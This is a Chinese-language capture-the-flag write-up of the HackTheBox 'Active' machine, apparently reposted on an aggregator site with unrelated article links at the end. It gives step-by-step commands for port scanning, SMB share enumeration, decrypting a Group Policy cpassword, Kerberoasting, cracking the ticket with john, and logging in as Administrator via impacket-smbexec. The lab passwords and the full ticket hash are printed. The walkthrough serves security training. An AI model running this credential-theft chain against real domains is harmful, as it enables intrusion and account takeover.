HTB:Active[RE-WriteUP]

目錄

連接至HTB服務器并啟動靶機

信息收集

使用rustscan對靶機TCP端口進行開放掃描

將靶機TCP開放端口號提取并保存

使用nmap對靶機TCP開放端口進行腳本、服務掃描

使用nmap對靶機TCP開放端口進行漏洞、系統掃描

使用nmap對靶機常用UDP端口進行開放掃描

使用nmap對靶機UDP開放端口進行腳本、服務掃描

使用smbmap枚舉靶機SMB服務共享

繼續使用smbmap對Replication共享進行遞歸枚舉

邊界突破

使用gpp-decrypt解密上述Cpassword密碼

使用netexec通過上述憑證可枚舉靶機域內用戶

使用impacket-GetUserSPNs提取靶機域內SPN關連賬戶

使用john通過字典爆破該TGS票據

使用impacket-smbexec通過上述憑證登錄靶機


連接至HTB服務器并啟動靶機

分配IP:10.10.16.22

靶機IP:10.10.10.100

靶機Domain:active.htb


信息收集

使用rustscan對靶機TCP端口進行開放掃描

rustscan -a active.htb -r 1-65535 --ulimit 5000 | tee res

將靶機TCP開放端口號提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,
53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49167
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)???????????????????????????? ?
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# echo $ports???????????????????????????????????????????????????????????????????? ?
53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49167

使用nmap對靶機TCP開放端口進行腳本、服務掃描

nmap -sT -p$ports -sCV -Pn active.htb

  • 需要重點關注的服務和信息

53端口:Domain服務

88端口:Kerberos服務

389端口:LDAP服務

445端口:SMB服務

Domain:active.htb

使用nmap對靶機TCP開放端口進行漏洞、系統掃描
nmap -sT -p$ports --script=vuln -O -Pn active.htb

使用nmap對靶機常用UDP端口進行開放掃描

nmap -sU --top-ports 20 -Pn active.htb

使用nmap對靶機UDP開放端口進行腳本、服務掃描
nmap -sU -p53,123 -sCV -Pn active.htb

使用smbmap枚舉靶機SMB服務共享

smbmap -H active.htb

繼續使用smbmap對Replication共享進行遞歸枚舉
smbmap -H active.htb -r Replication --depth 10

  • Groups.xml文件下載到攻擊機本地
smbmap -H active.htb -r Replication --depth 10 --download Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

  • 查看該文件內容
cat 10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
  • 審計該文件內容

Name:active.htb\SVC_TGS

Cpassword:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

  • 由于該文件所在路徑存在字樣:Policies(策略)、Groups(組),因此我首先考慮Windows組策略加密

邊界突破

使用gpp-decrypt解密上述Cpassword密碼

gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18

  • 由此獲得完整憑證

賬戶:SVC_TGS

密碼:GPPstillStandingStrong2k18

使用netexec通過上述憑證可枚舉靶機域內用戶

netexec smb active.htb -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users
  • 由此證明該憑證可用

使用impacket-GetUserSPNs提取靶機域內SPN關連賬戶

  • 首先使用ntpdate與靶機域控制器時間同步
ntpdate active.htb
  • 使用impacket-GetUserSPNs直接請求與SPN關聯賬戶TGS票據

  • 將該TGS票據內容存入文件
echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5eb2a4781b6945ef9ab744f712190930$f2cc7458fb68d043eefabd6db760f9639839d111c712d9ffe4b7e0b011c314865c7ae68a43de4ec7c84da9969594a231188f90cf14410e7a76b2f1c34c738f099de87d233dc9feb21b8bb21b851e3c1cc9496c042a6cf4723ee4c3b3cd5e66ca36cfe89a526bbd9a6cfe94b0860d68c9314520a24d52a4eacecca3d6cd98e11bd4fb0a0a09ec309b9318f931077d5c5a80a4446b4ae005bb902d478737655e0689038db6cdd9920d65e1fd40713ba122701ca2542bf926a28f8e603e1a09690f7de76e0e8323363a16601ccf3babb94cc93ed375dec3c33c2c0fefa5832b886e6a65318b605d7f77e3945382928cf28e7622e5b128528d8332cfc78afe10b1350d93b02e48b31bfbd0cad6d4c2c0a8174eaeb5b9512dbf29b35a2eb7c335da6be6344816d4963aa0c86f70e61af664166b711cd24cf98ad92c89d39f04a7c1aa875d5f6eb551d63f30ec613d68be3a7e1fb037633ad4c60389c9e334970117c0370ce4aa3b7e0fa550b478c65e6805e21101991daa20c2e2b3f6cf8e8e631c5deb02f4d7f6f075ab326a82674f1877207d6ced05463aea1e4b1504673dddb0704a3e67de3fc25238034fd3127252f7e70f3391703a52f967df72608349b5927ff5f6e62267a5e5fd34a28c0f5f5b59576b32748be857317ed93c909c10459c1d0d74b67301516a6a4f393ed7f22fa89041eba38c438d50b064c1dfec8c1323b2af3390f3169c9e6a9fa1d9dad275f95993f6cac99208e9235cf288dc302cdab0d8f925d84cdc16cc57fefb75a91fa305961ef809ff1f240408da6f1d3a871d296235a1e95629d74c071211ed9a3d8a99d3feb82bea214f5ad245ec48aabb11737b9e24ac32549af8ea5c4bf200fecc838dd4e4adf0e4cf38e16b858eb9b9745edc94693c2c7a7ac4f55634bcdf1a56bb9cdb0179e50768b0e1a4efd4c62b7f0331145a64a7666abc3e165f41d5111856a0e9722d07bc85ab14d3e135bf3d22a49eb73103cdff6f630994ff858319fb4836d076bc07a37beedac6714923504ebd0c15382a3e3f281c37a8793e52ebd0133273b0c5ca99f330d377eb336c384d9ce80072c81ec16920af62cbd0bd9c573071287e6e273a21fe684df9e59775c8d20df37fd2aec038a3d8a7b609f96a66f612f19db51949b4db500b6cbbfc7651583c2e6503e806d1e2e611deee2c493f12edb281241758353601951e2a22f2d34eaed8918e126b8420528398894333f8ef074c8f35b495c2160b6c' > hash

使用john通過字典爆破該TGS票據

john hash --wordlist=../dictionary/rockyou.txt --format=krb5tgs

賬戶:Administrator

密碼:Ticketmaster1968

使用impacket-smbexec通過上述憑證登錄靶機

impacket-smbexec active.htb/Administrator:Ticketmaster1968@active.htb

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/67440.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/67440.shtml
英文地址,請注明出處:http://en.pswp.cn/web/67440.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Git圖形化工具【lazygit】

簡要介紹一下偶然發現的Git圖形化工具——「lazygit」 概述 Lazygit 是一個用 Go 語言編寫的 Git 命令行界面&#xff08;TUI&#xff09;工具&#xff0c;它讓 Git 操作變得更加直觀和高效。 Github地址&#xff1a;https://github.com/jesseduffield/lazygit 主要特點 主要…

58.界面參數傳遞給Command C#例子 WPF例子

界面參數的傳遞&#xff0c;界面參數是如何從前臺傳送到后臺的。 param 參數是從界面傳遞到命令的。這個過程通常涉及以下幾個步驟&#xff1a; 數據綁定&#xff1a;界面元素&#xff08;如按鈕&#xff09;的 Command 屬性綁定到視圖模型中的 RelayCommand 實例。同時&#x…

selenium定位網頁元素

1、概述 在使用 Selenium 進行自動化測試時&#xff0c;定位網頁元素是核心功能之一。Selenium 提供了多種定位方法&#xff0c;每種方法都有其適用場景和特點。以下是通過 id、linkText、partialLinkText、name、tagName、xpath、className 和 cssSelector 定位元素的…

51單片機(STC89C52)開發:點亮一個小燈

軟件安裝&#xff1a; 安裝開發板CH340驅動。 安裝KEILC51開發軟件&#xff1a;C51V901.exe。 下載軟件&#xff1a;PZ-ISP.exe 創建項目&#xff1a; 新建main.c 將main.c加入至項目中&#xff1a; main.c:點亮一個小燈 #include "reg52.h"sbit LED1P2^0; //P2的…

29. C語言 可變參數詳解

本章目錄: 前言可變參數的基本概念可變參數的工作原理如何使用可變參數 示例&#xff1a;計算多個整數的平均值解析&#xff1a; 更復雜的可變參數示例&#xff1a;打印可變數量的字符串解析&#xff1a; 總結 前言 在C語言中&#xff0c;函數參數的數量通常是固定的&#xff…

RoboMaster- RDK X5能量機關實現案例(一)識別

作者&#xff1a;SkyXZ CSDN&#xff1a;https://blog.csdn.net/xiongqi123123 博客園&#xff1a;https://www.cnblogs.com/SkyXZ 在RoboMaster的25賽季&#xff0c;我主要負責了能量機關的視覺方案開發&#xff0c;目前整體算法已經搭建完成&#xff0c;實際方案上我使用的上…

shell腳本批量修改文件名之方法(The Method of Batch Modifying File Names in Shell Scripts)

shell腳本批量修改文件名方法 我們可以使用Shell腳本來實現這個功能。Shell腳本是一種用于自動化任務的編程語言&#xff0c;它可以在Unix/Linux操作系統上運行。在這個腳本中&#xff0c;我們將使用一個for循環來遍歷目標目錄下的所有文件&#xff0c;并使用mv命令將每個文件…

MySQL誤刪數據怎么辦?

文章目錄 1. 從備份恢復數據2. 通過二進制日志恢復數據3. 使用數據恢復工具4. 利用事務回滾恢復數據5. 預防誤刪數據的策略總結 在使用MySQL進行數據管理時&#xff0c;誤刪數據是一個常見且具有高風險的操作。無論是因為操作失誤、系統故障&#xff0c;還是不小心執行了刪除命…

RDK X5運行DeepSeek-R1-Distill-Qwen-1.5B,體驗長思維鏈的語言大模型!

簡介 本文介紹了在RDK X5上&#xff0c;如何從HuggingFace的原始模型權重&#xff08;safetensors&#xff09;經過量化和編譯&#xff0c;的到llama.cpp推理框架所需要的GGUF格式的模型&#xff0c;然后演示了如何使用llama.cpp運行量化后的DeepSeek-R1-Distill-Qwen-1.5B模型…

SQL UCASE() 函數詳解

SQL UCASE() 函數詳解 在SQL中&#xff0c;UCASE() 函數是一個非常有用的字符串處理函數&#xff0c;它可以將字符串中的所有小寫字母轉換為大寫字母。本文將詳細介紹UCASE() 函數的用法、語法、示例以及其在實際應用中的優勢。 一、UCASE() 函數簡介 UCASE() 函數是SQL標準…

【Proteus仿真】【51單片機】簡易計算器系統設計

目錄 一、主要功能 二、使用步驟 三、硬件資源 四、軟件設計 五、實驗現象 聯系作者 一、主要功能 1、LCD1602液晶顯示 2、矩陣按鍵? 3、可以進行簡單的加減乘除運算 4、最大 9999*9999 二、使用步驟 系統運行后&#xff0c;LCD1602顯示數據&#xff0c;通過矩陣按鍵…

留學畢業論文如何利用不同問題設計問卷

在留學畢業論文的寫作中&#xff0c;我們經常會遇到各種問題&#xff0c;例如選擇合適的問題&#xff0c;選擇合適的研究方法&#xff0c;以及設計合理的研究過程。然而在完成留學畢業論文的過程中&#xff0c;我們往往會在研究設計這里卡住。即使我們選準了研究問題和研究方法…

深度學習在金融風控中的應用:突破傳統模型的瓶頸

深度學習在金融風控中的應用:突破傳統模型的瓶頸 金融風險控制(簡稱“風控”)是現代金融體系中至關重要的一環,關系到金融機構的穩定性、客戶的安全以及整體經濟的健康運行。近年來,隨著深度學習的迅猛發展,傳統的風控模型正面臨被顛覆的挑戰,新的技術手段和思維方式正…

Python中的函數(上)

Python中的函數是非常重要的編程概念&#xff0c;以下是詳細的介紹&#xff1a; 函數定義基礎 在Python中&#xff0c;函數是組織好的、可重復使用的代碼塊&#xff0c;用于執行特定任務。通過函數&#xff0c;我們可以將復雜的程序分解為較小的、更易管理的部分&#xff0c…

圖漾相機搭配VisionPro使用簡易教程

文章目錄 1.下載并安裝VisionPro軟件2.下載PercipioCameraForVisionPro軟件包3.軟件部署4.測試流程4.1 遍歷VisionPro SDK支持的參數4.2 設置示例4.2.1_cameraSingle.SetTriggerMode4.2.2 _cameraSingle.SetRegistration4.2.3_cameraSingle.SetInt4.2.4 _cameraSingle.GetInt4.…

新版IDEA創建數據庫表

這是老版本的IDEA創建數據庫表&#xff0c;下面可以自己勾選Not null&#xff08;非空),Auto inc&#xff08;自增長),Unique(唯一標識)和Primary key&#xff08;主鍵) 這是新版的IDEA創建數據庫表&#xff0c;Not null和Auto inc可以看得到&#xff0c;但Unique和Primary key…

(非技術)從一公里到半程馬拉松:我的一年跑步經歷

在24年初&#xff0c;從來不運動的我&#xff0c;連跑步一公里都不能完成。而在一年之后的2025年的1月1日&#xff0c;我參加了上海的蒸蒸日上迎新跑&#xff0c;完成了半程馬拉松。雖然速度不快&#xff0c;也并不是什么特別難完成的事情&#xff0c;但對我來說還是挺有意義的…

論“0是不存在的”

你看這又是一個悖論的例子。 你會說&#xff0c;既然你都寫出來了“0”&#xff0c;咋還能說它不存在&#xff1f; 總是刷到謝爾頓說零不存在那個視頻。可能有些小伙伴不解其意&#xff0c;為啥那小謝爾頓堅持說0不存在。我這說一個最簡單的視角&#xff0c;怎么理解這句話。…

電商系統-用戶認證(三)基于公鑰解析JWT令牌

一、 基于私鑰生成jwt令牌 步驟&#xff1a; 導入認證服務 將shangcheng_user_auth工程導入到項目中去&#xff0c;如下圖 啟動eureka&#xff0c;再啟動認證服務 3&#xff09; 認證服務中創建測試類 public class CreateJwtTest { ? /**** 創建令牌測試*/Testpublic voi…

單路由及雙路由端口映射指南

遠程登錄總會遇到登陸不上的情況&#xff0c;可能是訪問的大門沒有打開哦&#xff0c;下面我們來看看具體是怎么回事&#xff1f; 當軟件遠程訪問時&#xff0c;主機需要兩個條件&#xff0c;一是有一個唯一的公網IP地址&#xff08;運營商提供&#xff09;&#xff0c;二是開…